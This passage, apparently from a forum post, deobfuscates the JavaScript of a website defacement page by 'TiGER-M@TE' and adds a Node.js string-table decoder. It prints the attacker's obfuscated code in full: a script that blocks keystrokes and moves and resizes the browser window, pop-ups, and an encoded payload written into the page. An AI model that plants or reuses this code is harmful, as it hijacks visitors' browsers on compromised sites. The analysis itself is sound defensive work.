25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->

</html>

We'll first decode this section of text:
Code:
var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];


Which turns into:

Code:
var _0x8ae2=[
"http://zone-h.org/archive/notifier=TiGER-M%40TE",           // [0]  note: the "@" is stored URL-encoded as %40
"open",                                                      // [1]
"http://zone-h.org/archive/notifier=TiGER-M%40TE/special=1", // [2]
"http://lmgtfy.com/?q=Hacked by TiGER-M%40TE",               // [3]
"scrollBy",             // [4]
"title",                // [5]
"HackeD By TiGER-M@TE", // [6]  here the "@" is a literal \x40
"onkeydown",            // [7]
"resizeTo",             // [8]
"moveTo",               // [9]
"move()",               // [10]
"round",                // [11]
"fgColor",              // [12]
"bgColor",              // [13]
"LOL",                  // [14]
"availWidth",           // [15]
"availHeight"           // [16]
];

This is just an array of strings: the obfuscator's string table. Every property name and URL the script needs is stored here as \xNN escapes and referenced by index, so window[_0x8ae2[1]] means window.open and document[_0x8ae2[5]] means document.title. The only purpose is to keep words like open, zone-h.org and onkeydown out of a plain-text search of the page; it adds no capability of its own.
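As an added example, not code from the post or from the defacement page: a short Node.js routine that decodes a string table of this shape without eval() and rewrites the statements that index it. The input is a shortened copy of the page's _0x8ae2 table followed by one constructed statement that uses it; the function names (unescapeJsLiteral, extractStringTable, deobfuscate) are my own. The same routine works unchanged on the _0x9355 table further down; _0xd8af needs an extra unescape() pass, as the page's own code shows.

```javascript
// Added example (not from the original post): decode an obfuscator string
// table of the form  var _0xNNNN=["\x..","\x..",...]  and inline every
// reference to it, so the script can be read without ever executing it.

// Shortened copy of the page's _0x8ae2 table plus one constructed statement
// that indexes it (String.raw keeps the backslashes literal).
const SAMPLE = String.raw`var _0x8ae2=["\x6F\x70\x65\x6E","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x4C\x4F\x4C","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E"];if(document[_0x8ae2[1]]==_0x8ae2[2]){document[_0x8ae2[1]]=_0x8ae2[3];document[_0x8ae2[4]]=function(){return false;};window[_0x8ae2[0]]("http://example.invalid/");}`;

// Resolve \xNN, \uNNNN and the one-character escapes inside a JS string
// literal body. A hand-written decoder, not eval(): attacker text stays data.
function unescapeJsLiteral(body) {
  const simple = { n: "\n", t: "\t", r: "\r", "0": "\0" };
  return body.replace(/\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)/g, (_, esc) => {
    if (esc[0] === "x" || esc[0] === "u") return String.fromCharCode(parseInt(esc.slice(1), 16));
    return esc in simple ? simple[esc] : esc; // \" \\ \' stay as themselves
  });
}

// Locate  var NAME=[ ... ];  and return its name, its decoded entries and the
// exact declaration text (so the caller can strip it from the output).
function extractStringTable(src) {
  const m = /var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[([\s\S]*?)\]\s*;/.exec(src);
  if (!m) throw new Error("no string table found");
  const table = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  let hit;
  while ((hit = literal.exec(m[2])) !== null) table.push(unescapeJsLiteral(hit[1]));
  return { name: m[1], table, decl: m[0] };
}

// Replace NAME[i] with the decoded literal, then turn obj["ident"] into
// obj.ident so that window["open"] reads as window.open.
function deobfuscate(src) {
  const { name, table, decl } = extractStringTable(src);
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  let code = src.replace(decl, "").replace(ref, (_, i) => {
    if (+i >= table.length) throw new Error("table index " + i + " out of range");
    return JSON.stringify(table[+i]);
  });
  code = code.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  return { name, table, code };
}

function demo() { return deobfuscate(SAMPLE); }

console.log(demo().table);
console.log(demo().code);
```

Run it with node; the decoded table prints first, then the rewritten statement with document.title, document.onkeydown and window.open spelled out. Because nothing is evaluated, the routine is safe to point at a defacement file you have not read yet.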





Next, we have this set of text:
Code:
function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;


When you take the time to clean this code up, it looks more like this:
Code:
function details()                   // runs when the "TiGER-M@TE" name is clicked (onclick="details()")
{
   window[_0x8ae2[1]](_0x8ae2[0]);   // window.open("http://zone-h.org/archive/notifier=TiGER-M%40TE")

   window[_0x8ae2[1]](_0x8ae2[2]);   // window.open("http://zone-h.org/archive/notifier=TiGER-M%40TE/special=1")

   window[_0x8ae2[1]](_0x8ae2[3]);   // window.open("http://lmgtfy.com/?q=Hacked by TiGER-M%40TE")
}

window[_0x8ae2[4]](0,1);             // window.scrollBy(0,1)

if(document[_0x8ae2[5]]==_0x8ae2[6]) // if(document.title=="HackeD By TiGER-M@TE"): only on the defaced page
{
   function keypressed(){return false;};

   document[_0x8ae2[7]]=keypressed;  // document.onkeydown=keypressed: every keystroke is swallowed

   window[_0x8ae2[8]](0,0);          // window.resizeTo(0,0)

   window[_0x8ae2[9]](0,0);          // window.moveTo(0,0)

   setTimeout(_0x8ae2[10],2);        // setTimeout("move()",2): start the animation below

   var mxm=50;
   var mym=25;
   var mx=0;
   var my=0;
   var sv=50;
   var status=1;
   var szx=0;
   var szy=0;
   var c=255;
   var n=0;
   var sm=30;
   var cycle=2;
   var done=2;

   function move()
   {
      if(status==1)
      {
         mxm=mxm/1.05;
         mym=mym/1.05;
         mx=mx+mxm;
         my=my-mym;
         mxm=mxm+(400-mx)/100;
         mym=mym-(300-my)/100;
         window[_0x8ae2[9]](mx,my);
         rmxm=Math[_0x8ae2[11]](mxm/10);
         rmym=Math[_0x8ae2[11]](mym/10);

         if(rmxm==0)
         {
            if(rmym==0)
            {
               status=2;
            }
         }
      }

      if(status==2)
      {
         sv=sv/1.1;
         scrratio=1+1/3;
         mx=mx-sv*scrratio/2;
         my=my-sv/2;
         szx=szx+sv*scrratio;
         szy=szy+sv;
         window[_0x8ae2[9]](mx,my);
         window[_0x8ae2[8]](szx,szy);

         if(sv<0.1)
         {
            status=3;
         }
      }

      if(status==3)
      {
         document[_0x8ae2[12]]=0xffffFF;   // document.fgColor=0xffffff
         c=c-16;

         if(c<0)                           // after 16 passes: straight to state 8, so states 4-7 below never run
         {
            status=8;
         }
      }

      if(status==4)
      {
         c=c+16;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c>239)
         {
            status=5;
         }
      }

      if(status==5)
      {
         c=c-16;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c<0)
         {
            status=6;
            cycle=cycle-1;

            if(cycle>0)
            {
               if(done==1)
               {
                  status=7;
               }
               else
               {
                  status=4;
               }
            }
         }
      }

      if(status==6)
      {
         document[_0x8ae2[5]]=_0x8ae2[14];
         alert(_0x8ae2[14]);
         cycle=2;
         status=4;
         done=1;
      }

      if(status==7)
      {
         c=c+4;
         document[_0x8ae2[13]]=c*65536;
         document[_0x8ae2[12]]=(255-c)*65536;

         if(c>128)
         {
            status=8;
         }
      }

      if(status==8)
      {
         window[_0x8ae2[9]](0,0);      // window.moveTo(0,0)
         sx=screen[_0x8ae2[15]];       // screen.availWidth
         sy=screen[_0x8ae2[16]];       // screen.availHeight
         window[_0x8ae2[8]](sx,sy);    // window.resizeTo(sx,sy): fill the screen
         status=9;                     // matches no branch, so later passes do nothing
      }

      var _0xceebx11=setTimeout(_0x8ae2[10],0.3)   // setTimeout("move()",0.3): re-arm on every pass
   }
}

This is the classic window-dancing effect, and nothing more. Substituting the table entries: the gate if(document.title=="HackeD By TiGER-M@TE") limits it to the defaced page itself. Inside it, document.onkeydown is set to a handler that returns false (keystrokes are swallowed), the window is shrunk with resizeTo(0,0) and parked with moveTo(0,0), and move() is started through setTimeout("move()",2). move() is a state machine on status: 1 swings the window toward roughly (400,300), 2 grows it back, 3 sets fgColor to white and counts c down, 8 moves the window to (0,0) and resizes it to screen.availWidth by screen.availHeight, and 9 matches no branch. As written, state 3 jumps straight to 8 once c goes negative, so states 4 to 7 (the red bgColor/fgColor pulse, the title change to "LOL" and the alert("LOL")) are never reached. Every pass re-arms itself with setTimeout("move()",0.3). Separately, details() runs when the "TiGER-M@TE" name is clicked and opens three pop-ups: two zone-h.org notifier archive pages and an lmgtfy.com search. All of this is window geometry, colours and pop-ups; nothing here reads or writes files, and nothing is downloaded.




We also have this set of code:
Code:
<script>var l1n3='<img src="data:image/gif;base64,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" />';
document.write(l1n3+l1n3);</script>

This bit of code simply writes the same image to the page twice; it is a black gradient divider. Because the src is a data: URI, the GIF bytes are embedded in the page itself and rendering it causes no network request. You can put this in an HTML file on your desktop and test it.




Next, we have:
Code:
<script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>


cleaned up, it looks more like this:
Code:
if (navigator.appName == 'Microsoft Internet Explorer')
{
   document.write('
      <font face="Arial Black" size="5" color="#FF0000">
   ')
}
else
{
   document.write('
      <font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">
   ')
}


Internet Explorer of the day did not render the CSS text-shadow used in the second branch, so this is a simple if statement on navigator.appName: IE gets plain red Arial Black, every other browser gets black text with a white shadow. Either way all that is written is an opening <font> tag; there is no browser-specific payload here.






Next we have:
Code:
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>


cleaned up, it looks like this:
Code:
var _0x9355=[
   "title",                 // [0]
   "HackeD By TiGER-M@TE",  // [1]
   "<img src=\"http://www.fotonons.ru/images/17.03.11/bytigermte.jpg\" onerror=\"this.onerror=null;this.src='http://image.bayimg.com/maeadaadi.jpg';\" />",  // [2]
   "write"                  // [3]
];

if(document[_0x9355[0]]!=_0x9355[1])   // if(document.title!="HackeD By TiGER-M@TE")
{
   exit(0);                            // no such function in a browser: throws ReferenceError, which ends this script block
}
document[_0x9355[3]](_0x9355[2]);      // document.write("<img src=... />")

Again, the array is nothing more than a string table, but note what the code does with it: it reads the title rather than setting it. If document.title is anything other than "HackeD By TiGER-M@TE" it calls exit(0); there is no such function in a browser, so the resulting ReferenceError aborts this script block, which in practice works like a return. On the defaced page itself it document.write()s an <img> whose src is fetched from www.fotonons.ru, with an onerror fallback to image.bayimg.com. That image request is the only network traffic this block produces: whoever runs those hosts can count views of the defacement from their logs, but what is fetched is a picture, not something that executes on the visitor's machine.





Finally, we have this:
Code:
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35
\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x
43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->




When this code is cleaned up, we see:
Code: Select all
<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">

var _0xd8af=[
   "\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25
\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45",
   "\x77\x72\x69\x74\x65",
